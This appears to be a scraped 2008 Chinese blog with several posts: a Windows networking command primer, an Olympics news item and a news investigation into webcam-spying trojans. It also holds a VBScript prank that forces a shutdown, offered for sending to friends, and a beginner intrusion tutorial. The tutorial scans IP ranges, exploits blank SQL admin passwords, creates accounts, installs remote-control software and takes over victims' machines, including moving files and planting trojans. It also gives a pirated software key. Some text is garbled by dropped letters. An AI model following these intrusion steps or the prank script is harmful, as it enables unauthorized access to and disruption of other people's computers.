5a77 我爱亲亲
( Sat, 30 Aug 2008 21:34:00 +0800 )
Description:
1.最基本,最常用的,测试物理网络的
ping 192.168.0.8 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\> lookup
Default Server: .hesjptt.net.cn
Addre : 202.99.160.68
> erver 202.99.41.2 则将DNS改为了41.2
pop.pcpop.com
Server: .hesjptt.net.cn
Addre : 202.99.160.68
Non-authoritative a wer:
Name: pop.pcpop.com
Addre : 202.99.160.212
3.网络信使
Net send 计算机名/IP * (广播) 传送内容,注意不能跨网段
net stop me enger 停止信使服务,也可以在面板-服务修改
net start me enger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名 (追捕的工作原理)
ping -a IP -t ,只显示NetBios名 tstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP!:
ARP -s 192.168.10.59 00 -50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\> et view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: \192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net se ion
例如: C:\> et se ion
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享(可以编个bat文件,开机自运行,把共享都删了!)
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
netshint
interfaceip
interface i gt et add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface i gt how addre Arp
显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上***的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。
在命令提示符显示帮助。
InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。
通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中***为网络适配器属性的组件时,该命令才可用。
要显示所有接口的 ARP 缓存表,可键入:
对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:
arp -a -N 10.0.0.99
要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入:
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在“计划”服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。
at [\ComputerName] [{[ID] [/delete] /delete [/yes]}]
at [[\ComputerName] hours:minutes [/interactive] [{/every:date[,...] /next:date[,...]}] command]
\computername
指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。
指定指派给已计划命令的识别码。
/delete
取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。
删除已计划的事件时,对来自系统的所有询问都回答“是”。
hours:minutes
指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。
/interactive
对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
/every:
在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。
指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。
在下一个指定日期(比如,下一个星期四)到来时运行 command。
command
指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。
在命令提示符显示帮助。
Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅“相关主题”。
使用 at
使用 at 命令时,要求您必须是本地 Administrators 组的成员 评论这张
转发至微博
( Wed, 13 Aug 2008 20:48:00 +0800 )
Description: 评论这张
转发至微博
( Wed, 13 Aug 2008 20:38:00 +0800 )
Description: 评论这张
转发至微博
( Wed, 13 Aug 2008 20:35:00 +0800 )
Description: 评论这张
转发至微博
( Sat, 9 Aug 2008 14:49:00 +0800 )
Description:
开幕式演唱《歌唱祖国》的可爱小女孩——林妙可
“五星红旗迎风飘扬,胜利歌声多么响亮,歌唱我们亲爱的祖国,从今走向繁荣富强……”这首“歌唱祖国”,早已被亿万中国人所熟悉,但作为开幕式上演唱的第一首歌曲,不是雄壮有力的合唱,而是从一个天真可爱的小女孩口中唱出,所有在场观众都深深打动了。诞生于建国初期的“歌唱祖国”,表达了全国人民渴望繁荣富强的强烈愿望和坚强决心。但谁都不会想到共和国成长会经历太多的曲折,也不会想到几十年后能够举办举世瞩目的。当我们祖国真的一天天繁荣富强起来,特别是经历了许许多多的苦难后,再目睹眼前的盛况,无不让所有人热泪盈眶。从中国走出去的千百万华人,听着这首歌长大的一代又一代,看到祖国的今日,谁能心如止水?伴着小姑娘稚嫩、缓缓的歌声,我们仿佛真的看到“东方太阳,正在升起,人民共和国正在成长……”,在这样的时刻,再听到这首歌,在场的全体观众,代表了世界上的全体华人,心潮澎湃,泪如泉涌,无不跟唱,响彻在世界每一个角落:“越过高山,越过平原,跨过奔腾的黄河长江,宽广美丽的土地,是我们可爱的家乡,英雄的人民站起来了!我们团结友爱坚强如钢。”
自从女儿林妙可亮相开幕式高歌《歌唱祖国》以后,亲戚朋友道贺的***就没有断过。“这个秘密,我们已经保守半年了。”
林妙可是北京市东城区西钟街小学三年级二班学生,今年9岁。别看年纪小,会的还不少。学校教导主任毛老师说:“这个孩子已经学习了两年声乐,四年的舞蹈,学习成绩也在班上名列前茅”。由于综合素质全面,样貌甜美,妙可经常被选去拍一些广告片。
刘哲平透露,今年春节前,妙可受邀拍摄一个迎接奥运的公益广告,后来张艺谋导演看到了这个片子,记住了这个大大眼睛、大大酒窝的小姑娘,便让助手找到了妙可的联系方式。
今年4月,妙可接到了开闭幕式运营中心的***,通知前去试音。刘哲平说,导演组曾经透露,因为这是惟一一个童声演唱,并且引领五星红旗入场,非常重要,最多找来了几千个小朋友试音,可谓千里挑一。
爸爸林晖说,最早并没有太大的信心,只是抱着试一试的心态而来,毕竟来试音的小朋友都很出色。“没想到,我们一路过关,6月份只剩4个小朋友时,还有我们妙可”,最终顺利站在鸟巢中心,让纯真清澈的童音响彻全球。
妈妈透露了一个有意思的事情:“导演组说,正式演出时穿红色的裙子,我几乎把北京所有卖儿童衣服的商场都跑完了,最终买回8条,导演组PASS掉7条。”于是,看到了这条红色的纱裙。
记者昨晚拨通陪同妙可演出的毛老师***,话筒里传来清脆的童声:“我不紧张,一点都不紧张。阿姨,我笑得好看吗?”她说,昨天下午3点钟就到鸟巢,由化妆师梳头发、化淡妆,“化妆的老师说,小朋友要化简单点,越天真越好”。妈妈则笑着说,妙可心理素质很好,场面越大越兴奋,妙可说,“因为那时候的我很美啊”。
毛老师说,演出结束后,妙可将迅速回到正常的学习中来,“毕竟还是个孩子,心理慢慢要恢复正常,这是她众多人生经历中一次美妙的体验”。 评论这张
转发至微博
( Sat, 2 Aug 2008 21:56:00 +0800 )
Description: 相关软件网上泛滥,记者调查证实确可在对方不知情前提下强行打开其摄像头拍摄
“有种软件很厉害,可以强行偷偷打开别人的QQ摄像头,我在网上就看到一段远程偷拍的网友***视频。”近日,一名报料人阿伟(化名)向记者报料。
真有这样的软件?记者随后循线索展开调查。尽管未能证实被上传的性爱片段是否真为遥控偷拍,但记者调查却证实网上售卖的一些木马程序软件,确实可以实现远程控制摄像头拍摄。家里装有摄像头的网友们,完全有可能在不知不觉中被人远程偷拍。
读者报料
1 未关电脑交欢被偷拍?
记者找到相关视频,但未确定是否为强行打开摄像头偷拍所得
疑问一视频聊一次就已被“监视”?
记者按照阿伟提供的网址看到了这段叫“QQ偷拍网友***视频”的视频画面。
由于室内并未开灯,这段视频画面比较暗,但仍可依稀看到两名全身赤裸的男女在床上***。躺着的女子头部在画面中,但由于太暗看不到相貌,而居于上体位的男子只能看到头部以下。
从视频画面拍摄的角度来看,似乎也像床前的电脑摄像头正对着拍摄。
发帖人介绍称,该视频是他的“得意之作”,画面中的女主角是他的网友,用视频聊过一次后就没怎么和他聊了,“可能是觉得我不够帅吧”。之后,他利用强制偷拍视频软件监视对方,只要女网友的电脑开着,他都可以看到女网友的行为举动。发帖人称,平时女网友睡觉都会关电脑,那天晚上男友过来后,并未关电脑,两人就在床上“云雨”,结果***的画面就在摄像头里面“直播”,他在“大饱眼福”之余,还把这段画面传到网上与大家共享。
由于这段视频的主角无法确认,记者难以确认该画面是不是被QQ摄像头偷拍的。
疑问二不雅之动作印证是偷拍?
阿伟还告诉记者,在一些秘密的***网站论坛里,不少网友都会上传一些据称都是QQ偷拍的视频。这些视频多数都是女网友的视频图像,有的是洗完澡后穿着内衣就直接上网。阿伟表示,上传者都有强制视频软件,可以令对方的摄像头不知不觉地打开,而对方毫不知情。
阿伟认为,虽然有些视频也无法判断是否真的是偷拍到的,但有一些视频明显是对方不知情的情况下被偷拍,因为有个别视频,女网友在摄像头前做着抠鼻等不雅动作,“如果是正常的和男网友视频聊天,不可能会这么不顾举止的。”
专家释疑
摄像头确可强行打开
计算机专家冯刚表示,强制视频软件运行原理类似于计算机中病毒
强制视频软件技术上的可行性有多大?记者就此采访了华南师范大学计算机学院冯刚副教授。
他表示,通过发送木马程序,确实可以强制打开摄像头。
冯教授称,自己也有看到过相关视频偷拍的新闻。他解释说,这个软件的运行原理其实不难,就好像计算机中病毒一样,它通过发送一些木马程序把电脑里的其他程序强行打开。即使没有收取自己网友发送的木马程序,平时当市民网上聊天或者浏览网页时,也很可能在不知不觉中接收特定的木马程序。木马会自动运行强行把摄像头打开,从而拍下网友的一举一动。接着所拍下来的视频会被控制通过网络传输到木马发送者的电脑中。
记者调查
记者在确认关闭了摄像头的情况下
半分钟,卖家发来记者视频
摄像头真的可以被强行被偷偷打开?
记者调查发现,强制视频软件充斥网上,卖家以100多元至几百元的价格叫卖。叫卖者多数声称最适合调查男女出轨行为。记者选择了其中一个软件进行检测,发现其确实“有效”。
相关软件网上热卖
记者在Google 里输入“强制视频”搜索,结果搜出815,000个查询结果。只见搜索结果里有各种各样的强制视频软件下载地址,一款叫“&am time am time 暴力强制视频软件”声称,软件可以在不使用任何第三方通讯软件的前提下,直接看到对方视频。只要你知道对方的IP,对方***了网络摄像头。该软件的下载页面称,“简单的操作,直接在软件的正下方输入对方IP地址,就能在对方不知情的情况下打开对方将的网络摄像头,远程视频直接发送到你的电脑里,实时观看远程视频,而且开启视频的时候无响声,无提示,不会被对方发现。”
在这些视频软件的下载地址页面,多数视频软件都声称只要知道对方IP就可实现强制视频,而记者尝试下载一些软件后,发现并不能运行,还需要获取注册码或密码,而获取注册码就需要付款。一款叫“深&am time 视频木马”的软件,直接叫价300元。由于记者未付款,这些强制视频是否真的有用,尚不得而知。
需要发送木马文件
记者随后发现,在一个网站上,一款名叫“火&am time 侦探远程监控”的软件似乎更加先进。网站的网址名称里还像模像样地加入了“110”数字,声称该监控软件“不需知道对方IP,同样可以进行监控。不受所有QQ软件版本限制,远程强行打开对方摄像头、麦克风、电脑屏幕,自己可以随时监控并且进行录像,***对方声音环境而不被发觉,随时为你开通第三只眼。”该软件价格为198元,并且“包教包会”。
记者按照网站上提供的***QQ号码,与网站的***人员取得联系。该***人员表示,网络上很多强制软件说只要知道对方IP就可以强制打开摄像头的,多数是假的骗钱的,他们的这个软件绝对可用。软件在操作中,需要发送一个文件给欲强制视频的对象,这个文件实际上是个木马程序,一旦对方接收了这个木马,以后只要对方打开电脑,就可以强行打开对方的摄像头偷窥对方,而对方完全察觉不到。
“这个软件很适合偷看女人是否红杏出墙,或者监控公司的员工上班时间在做些什么,或者网聊多日的MM,就是不答应和你视频聊天,也可以用这个看到对方的庐山真面目。”这名***男子还积极地进行推销,并向记者支招:“至于把木马文件发给对方,你就要想办法啦,木马文件可以隐藏在图片里,熟人之间你可以死缠烂打,或者也可以以帮他检测软件的名义发过去。”
半分钟内实现偷拍
这种强制视频软件真有如此大的神通?面对记者的疑问,这名男子发给记者一份软件运作的“图文教程”。该男子还让记者在他们的网站上下载一幅QQ强制视频的样板图,记者下载后发现,该文件是一个说明性文件,显示了QQ摄像头监控的运作过程。在左侧的“被控端”,有一排的至少数十个的QQ昵称,右侧的“摄像头监控”窗口里,有“开始监视”、“停止监视”、“录像”和“截图”等各种控制栏。监控窗口正中央,是一个正上网女孩的视频画面。该男子说,被控端的QQ昵称,都是已接收木马程序的监控对象,只要他们开着电脑,他们在电脑摄像头前的一举一动都可尽收眼底。
记者表示怕上当,想测试一下这个软件是否真有效,该男子于是发送了一个临时木马文件给记者,记者看到,这个文件看起来是个普通的程序。记者把摄像头确保关闭状态,没有任何的异样,半分钟后,男子发送了一个截屏给记者。记者一看:正是本人端坐电脑前的视频画面!
2 员工举动尽收老板电脑中
有律师称,偷拍隐私可被处拘留10天
网上售卖的远程操控摄像头软件,卖家称买的人一般是用来搞婚外情调查或是公司老板监控下属。记者在调查过程中就发现有这种行为。
报料人小张向记者抖出一个秘密:他曾供职的广州一家私营企业的老板,就曾把全公司的电脑装上摄像头,偷偷购买了强制视频侦探软件,全天监控员工的一举一动。而这名老板也向记者默认了确有这回事。
“神奇”老板让人吃惊
小张表示,他去年3月进入海珠区一家小型印刷公司做业务员,公司只有20多人,每个人都有一台电脑。他进公司的时候,就发现公司的电脑全部装有摄像头,当时还觉得纳闷。老板说,摄像头都是买电脑时免费附加赠送的,所以当时也没多想。
小张说,平时上班大家都不进行视频聊天。那时公司同事闲聊时不时会议论,说老板太精了,有的同事上班偷懒打私人***时,经常会被老板撞破。“有一天,老板不在公司,叫我出去跑一个业务,我想偷点懒,虽然在***里答应老板马上出发,但还在办公室继续和女朋友网上聊天,结果老板连续几个***打到我手机上,问我怎么还在公司,好像知道我还没去似的,当时觉得老板太神奇了。”
利用摄像头监视员工
“在公司的时候,似乎大家的一举一动都逃不过老板的眼睛。”小张告诉记者,因此同事们都在怀疑谁是老板的“眼线”亲信,猜来猜去同事间还闹出不少矛盾。直到有一天,小张发现了这个惊人的秘密:那天他拿一张报销单到老板办公室找老板签字,门是开着的,进去后他突然发现老板的电脑屏幕上开着个窗口,里面显示着另一个女同事小苏正打***的画面。老板见有人进来,赶紧关了电脑。
“当时我还以为女同事小苏和老板视频聊天,两人有暖昧呢。”小苏说,后来那天他和小苏聊天时,拿这个取笑小苏,小苏听到后惊叫起来,说自己根本没有和老板视频聊天。于是两人都怀疑老板是在暗中监视员工,商量后,先不告诉其他同事,去找老板问这事。
摄像头后来全被拆掉
据小张介绍,后来老板分别找他们两个谈了话,承认是有用一种木马程序软件强行打开员工摄像头监控,但那是为了公司的利益,还叫他们保密,这样对他们有好处。小张觉得心里不是滋味,再加上有另一家待遇更好的公司可去,不久就辞职了,小苏后来也辞职。因为觉得老板以往对自己不薄,所以小张帮了老板一把,没有把这事告诉其他同事。小张说,后来从其他同事那听说,老板在今年4月份把摄像头都拆掉了。
记者近日联系到小张的前老板刘某,当自称是小张的朋友,说因摄像头的事小张心里还有阴影,他对摄像头的事表示默认,并说:“已经过去了,早就拆掉了。”但后来记者表明身份时,他就表示不想再说了,推说“很忙”挂掉了***。
听闻强制视频吓得“心惊惊”
也有市民表示想用来进行监控
记者采访众多市民发现,对于用强制视频软件偷拍,一方面不少网友大感恐慌,担心自己的隐私会被泄露;另一方面却有不少人表示想搜罗到这种工具***,以监控家人、情人和小孩。
担心者
不用时遮住摄像头
得知有这样一种软件后,很多市民都感到惊讶及恐慌。“那不是一点隐私都没有了?!”白领李***感叹道。“如果我的上司***了这样的软件,那我偶尔开小差不也全被发现了,那就惨了!”张***满脸愁云地对记者说。
在岗顶某公司上班的刘***感到很气愤:“这种QQ强制视频软件太恐怖了,在我不知道的情况下可以远程视频一直看着我,这简直就是侵犯人的隐私权!”刘***说,家里的电脑也有摄像头,现在天气热,通常回家就会脱掉外衣,有时只穿睡衣或内衣上网,而自己也曾经接收过认识不久的网友发的文件和图片,“还不知道是不是那种强制视频的木马呢,以后不用视频的时候我一定要把摄像头盖住!”
在恐慌的同时,很多上班族也对电脑摄像头产生了畏惧心理。经常在网上视频聊天的广告公司职员刘先生表示,还好自己的电脑不是自带摄像头的,“以后真的不敢用摄像头了,现在真是看到它就怕了。”而电脑自带摄像头的黄***则说:“现在一坐在电脑前就感觉好像有双眼睛在盯着自己,做什么都不自在。”
好奇者
买来用于监控亲友
在一些市民感到恐慌的同时,部分市民则对这种软件表现出了极大的兴趣。
市民马***知道有这种软件后连连向记者打听,“知不知道哪里可以找到这种软件?我想***。”她说她男朋友最近很忙没时间陪她,可电脑却天天开着,真有这种软件她就可以时常看到他,还可以在不打扰他的情况下监视他在做些什么。同马***一样,不少女士看中了这种软件的监视功能。担心老公在外面找外遇的冯女士表示,“如果有这种软件,我一定要***一个,这样就可以监视他了,到时候找到证据看他还怎么抵赖。”
还有些市民由于工作原因,不得已要让孩子自己呆在家里。一些家长也表示想了解并***这种软件,以便在上班的时候可以监控小孩子有没有发生意外,或者监督他们的学习情况。儿子上小学的郭女士表示,“儿子现在开始用QQ聊天了,有时还背着我聊,我倒很想用这个来看看他到底聊的啥。”
专家支招
及时更新木马防护栏
如何防范这种视频偷拍?华南师范大学计算机学院冯教授表示,只要有网络就有可能遇到这种情况,所以建议网友***性能良好的木马防护栏并及时更新,不用的时候,最好把摄像头摘下来或对着角落位置。
专家指出,这类强制视频聊天能够得逞的基础是我们接收并运行了对方发过来的木马程序,因此,只要我们不要轻易接收陌生人发送过来的文件,并注意在运行文件前先对文件进行杀毒操作,那么我们就可以避开这个陷阱。
电脑专家提醒网民,想防止被偷拍应做到以下几点:不随便登录不明网站,以免染上木马病毒,不接受陌生人发来的图片;尽快帮自己的系统打上最新的补丁;装杀毒软件和防火墙,并及时更新;发现机器运行出现异常情况,应及时进行检查;留意摄像头的工作灯,如果不是自己开启的话,就应断掉互联网的链接。
各界看法
关闭售非法软件网站
售卖远程操控摄像头软件是否合法?
记者昨日致电广州市公安局网监处举报。一位工作人员表示,这种强制视频软件偷拍是属于侵犯隐私的行为,但一直以来较少收到这方面的举报,现在全国有统一行动打击这种行为,像这类售卖软件的网站,要看其开设在哪里,广州警方接到举报后会通报当地的有关部门,对其进行关闭网站等处理。
该工作人员还表示,对这种行为监管有一定难度,因为网上的非法行为太多了,此外网站是在通信部门登记的,市民发现不法行为的网站也可以向广东省通信管理局举报。他还表示,涉及到侵犯隐私造成严重后果的,警方可对侵犯者依照法律进行处理。
偷拍隐私可拘留10天
广东大同律师事务所的贺欣律师认为,这种强制视频软件就是个木马程序。木马程序从技术上本身并不违法,但这些软件有些类似***性质,我国法律明文规定,***是不能***的,所以网上叫卖强制视频软件行为类似******行为,也可认为是违法。
对于买下这种软件的使用者,贺欣律师认为,判断其是否违法主要看其使用范围及用途,如果只是用来自娱自乐就没什么,但市民使用时如果别有用心,用来监视他人,侵犯到别人的隐私权,或者把他人的视频画面散布到网上,触犯到别人的利益,就构成违法。
如果构成侵权,偷拍者会受到怎样的处罚?据介绍,根据我国《治安管理处罚法》,偷窥、偷拍、窃听、散布他人隐私的,处五日以下拘留,情节较重的,处五日以上十日以下拘留,并处以罚款。
QQ视频偷拍案例
远程偷拍女邻居换衣
据报道,经警方调查,王某有一天晚上在无聊时发现林女士家的电脑没关,就用QQ强制软件,遥控偷拍录下了林女士洗澡换衣服的画面。
男子与妻***被偷拍
据报道,一名重庆男子出差,深夜与家中的妻子在QQ上***。几天后,一“黑客”通过QQ发来妻子***时的照片。据警方介绍,疑犯周某是用“黑客”手段控制摄像头并获取***照片 评论这张
转发至微博
( Fri, 1 Aug 2008 20:15:00 +0800 )
Description:
on error resume next
dim WSHshellA
set WSHshellA = wscript.createobject("wscript.shell")
WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true
do while(a "我是猪")
a = i utbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000)
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"
msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛"
dim WSHshell
set WSHshell = wscript.createobject("wscript.shell")
WSHshell.run "cmd.exe /c shutdown -a",0 ,true
msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,真过瘾"
把上面的文字复制到记事本内。另存为名字随便你起记住后面的一定要加 .vbe
使用文件传送给朋友只要朋友一打开一分钟就会关机。如上面说的要你说那三个字就不会关机了哈哈大家试试吧。
我爱亲亲 评论这张
转发至微博
( Fri, 1 Aug 2008 19:51:00 +0800 )
Description:
1,傻瓜级入侵
之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目!
需要软件:Wi tAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是"开始"-"所有程序"-"附件"-"通讯"-"远程桌面连接" 不知道在哪下?用百度搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我"在哪下?把地址给我吧",太懒了吧,难道下载地址在我脑子里?我不也是要搜吗?
好了,下边我们开始入侵了,下边就是过程:
第一步. 打开Wi tAutoAttack,就是那个手雷的标志,在"起始ip"里和"目标ip"里填上一个ip段,并且尽量把范围搞大点,比如在"起始ip"里填"218.88.1.1",在"目标ip"里填"218.88.255.255".ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上"仅对ping检查成功的机器进行检测","检测3389端口"和"收集netbios信息"
在"IIS溢出"选项卡里勾上"开99端口shell",这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在"简单管理员密码"选项卡里勾上"列出所有密码简单的管理帐号"和"上传并***远程图形控制软件". 在"sql漏洞"选项卡里也一样,就是把三个框都打上勾,就是"列出密码为空的sa帐号""建立系统管理员帐号(shanlu)"和"上传并***远程图形控制软件".
好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...)
ok!一切就绪!点"开始" . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧
第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点"信息",把上边的"废话框"内容往下拉
主机:218.88.55.55
3389,Windows 2000 Advance Server Terminal 端口开放。
SQL漏洞: sa帐号密码为空。 建立系统管理员帐号shanlu()成功
哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了!
要是有这样的提示:
主机:218.88.55.55
3389,Windows 2000 Advance Server Terminal 端口开放。
简单管理员密码: 帐号: TsInternetUser(1234567890)[Administrators]
就说明用户名是TsInternetUser,密码是1234567890,要是括号里什么都没有,就说明密码是空,也就是说括号里的是密码,前边的是用户名.注意,帐户必须要是管理员的帐户,否则登陆不上去!"[Administrators]"告诉我们这是个管理员帐户.
要是有主机提示开了4899端口或提示"***远程图形控制软件成功",我们就可以用Remote Administrator了!(Remote Administrator需要***,强烈建议***后把服务端卸载掉,方法:开始-运行,在"运行"框里填"wi t\system32\re_server.exe /uni tall",注意是"wi t"还是"windows"就看你的机器系统文件夹是什么了)卸载成功了会弹个对话框出来,说"removed succe fully"要是你不卸载,最少也要在***后给服务端装个密码,因为RA本来不是一个黑客工具,他是一个很方便的远程帮助的工具,甚至比windows自带的远程帮助工具用着还要舒服,可是,它同时也很象一个木马,有客户端和服务端,所以你要不把服务端卸载或加密码的话,很可能"螳螂捕蝉,黄鹊在后"你就成为别人攻击的目标了.
打开ra的客户端,也就是那个带红色"R"的图标,(蓝色的是服务端,不要点)提示要输注册码,一般这个下载的同时在"readme"文件里都能找到,要是找不到,我给你们一个:08le-2jgMggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk+ki2pQZHmM7lhys
VBux8HE7udeSR0D1E0
长吧哈哈,然后把那个勾勾上,那个勾的意思是下次不再出现这个窗口(都是乱码,晕~~)
进入了RA的主界面,我们点"add new co ection to the list"(建立新连接)在弹出来的窗口的两个框上都填上刚才开了4899或***图形控制软件成功的机器的ip,点ok,看下边多出来一个小电脑的图标没?双击进去,看见什么了?是不是看见人家的屏幕了?人家在干什么你都看的清清楚楚吧哈哈!
慢!!!你干什么,别乱动他的屏幕!先看看你用的是什么模式进去的!我来给大家介绍下上边的13个按纽的作用,我就给大家介绍其中的7个常用的吧.
第2个按纽,刚才我们用过了,就是添加主机按纽
第3个按纽,删除主机
第5个按纽(中间的第一个):这个按纽最厉害!先点这个,再双击你下边肉鸡的图标进去,你不但能看见肉鸡的屏幕,还能完完全全控制他的机器!!,不信,你双击他桌面上的图标试!!或者把他正在开的窗口关了!(我怎么这么坏?)是不是就和用自己电脑一样?哈!刚开始的时候你可能不习惯这种控制,慢慢的你就会习惯了.可是,用这个要小心啊,因为你控制他电脑的动作,只要你的肉鸡前有人,他就会发现,聪明一点的,他就立即下线了,而现在的肉鸡大部分都是浮动ip,好,你这个肉鸡白找了,还没玩过瘾就没有了...
第6个按纽:只能看见屏幕,但不能控制他的电脑,适合观察他机器的动静,比如猜猜看他机器前现在有没有人啊
第7个按纽:另类的telnet功能,你用这个模式进去后,看见的就和cmd下差不多,你可以在这个下边给你的这个肉鸡加个密码,这样后来的入侵者就进不去了(当然高手还是能进去,不过他肯定要利用其他漏洞了),并且你还可以在下边做你想做的一切!
第8个按纽,进入文件夹模式.上边的是你机器的文件夹,下边的当然是他的了,你可以在这里把你机器里的木马传到他机器上,当然你要是发现他机器上有什么你想要的,也可以下下来,并且一切都在神不知鬼不觉当中(贼??)具体的做法?一个字:拖!把你的文件用鼠标左键按着拖到下边他的文件夹上松开是上传,反过来就是下载了)方便吧?
第9个按纽,可以远程给他关机,重起什么的,怎么做不要我说了吧?RA 真的很好用,爽!
第3步:要是出现这样:
主机:218.88.55.55
SQL漏洞: sa帐号密码为空。 建立系统管理员帐号(shanlu)成功。
这说明我们可以用SQL漏洞了,看见Wi tAutoAttack的那个“SQLCMD执行”的选项卡没有?点它。
在“主机”后边输入ip,其他的不动,点“连接”,出现了“连接到主机:218.88.55.55”这个时候你点下“执行”(默认的执行"dir c:"),他的c盘文件是不是在你面前了?比如在下边执行“net start telnet”就是把它的telnet打开,然后开个cmd窗口,用刚才的管理员帐号"shanlu"telnet上去吧!具体怎么做,我在下个文章里讲ipc$的时候再讲。
